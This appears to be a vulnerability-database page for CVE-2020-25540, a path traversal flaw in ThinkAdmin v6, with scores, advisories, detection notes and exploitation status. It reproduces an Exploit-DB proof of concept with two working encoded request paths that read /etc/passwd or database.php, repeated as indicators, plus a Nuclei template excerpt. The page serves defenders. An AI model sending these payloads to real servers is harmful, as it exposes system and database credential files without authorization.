CVE-2020-25540
published 2020-09-14CVE-2020-25540: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode…
PriorityP183high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
75.88%
99.5th percentile
ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| thinkadmin | thinkadmin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s↗
url/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34↗
- →Detect exploitation attempts by matching GET requests to /admin.html with the path parameter 's=admin/api.Update/get/encode/' followed by an encoded traversal payload. ↗
- →A successful exploitation response will contain the string matching 'root:.*:0:0:' in the HTTP 200 response body, indicating /etc/passwd file read on Linux targets. ↗
- →The vulnerable endpoint is the ThinkAdmin API update handler; monitor for unauthenticated GET requests to 'admin/api.Update/get/encode/' with encoded path traversal strings. ↗
- ·The exploit payloads are version-specific; the vulnerability affects ThinkAdmin v6 up to and including version 2020.08.03.01 only. ↗
- ·Separate encoded payloads exist for Windows (targeting database.php) and Linux (targeting /etc/passwd); detection rules should account for both payload variants. ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
ThinkAdmin directory traversal vulnerability
ghsa·2022-05-24
CVE-2020-25540 [HIGH] CWE-22 ThinkAdmin directory traversal vulnerability
ThinkAdmin directory traversal vulnerability
ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter.
OSV
ThinkAdmin directory traversal vulnerability
osv·2022-05-24
CVE-2020-25540 [HIGH] ThinkAdmin directory traversal vulnerability
ThinkAdmin directory traversal vulnerability
ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter.
VulnCheck
thinkadmin thinkadmin Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2020·CVSS 7.5
CVE-2020-25540 [HIGH] thinkadmin thinkadmin Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
thinkadmin thinkadmin Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter.
Affected: thinkadmin thinkadmin
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-07-21&host_type=src&vulnerability=cve-2020-25540; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-08-10&host_type=src&vulnerability=cve-2020-25540; https://dashboard.shadowserver.org/statistics/
No detection rules found.
Exploit-DB
ThinkAdmin 6 - Arbitrarily File Read
exploitdb·2020-09-15·CVSS 7.5
CVE-2020-25540 [HIGH] ThinkAdmin 6 - Arbitrarily File Read
ThinkAdmin 6 - Arbitrarily File Read
---
# Exploit Title: ThinkAdmin 6 - Arbitrarily File Read
# Google Dork: N/A
# Date: 2020-09-14
# Exploit Author: Hzllaga
# Vendor Homepage: https://github.com/zoujingli/ThinkAdmin/
# Software Link: Before https://github.com/zoujingli/ThinkAdmin/commit/ff2ab47cfabd4784effbf72a2a386c5d25c43a9a
# Version: v6 <= 2020.08.03.01
# Tested on: PHP7.4.7,Apache
# CVE : CVE-2020-25540
PoC:
On Windows read database.php payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b2r33322u2x2v1b2s2p382p2q2p372t0y342w34
On Linux read /etc/passwd payload:
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
Nuclei
ThinkAdmin 6 - Local File Inclusion
nuclei·CVSS 7.5
CVE-2020-25540 [HIGH] ThinkAdmin 6 - Local File Inclusion
ThinkAdmin 6 - Local File Inclusion
ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.
Template:
id: CVE-2020-25540
info:
name: ThinkAdmin 6 - Local File Inclusion
author: geeknik
severity: high
description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.
remediation: |
Apply the latest patch or upgrade to a version that is not affected by the vul
No writeups or analysis indexed.
http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.htmlhttps://github.com/zoujingli/ThinkAdmin/issues/244https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.htmlhttps://github.com/zoujingli/ThinkAdmin/issues/244https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/
2020-09-14
Published
Exploited in the wild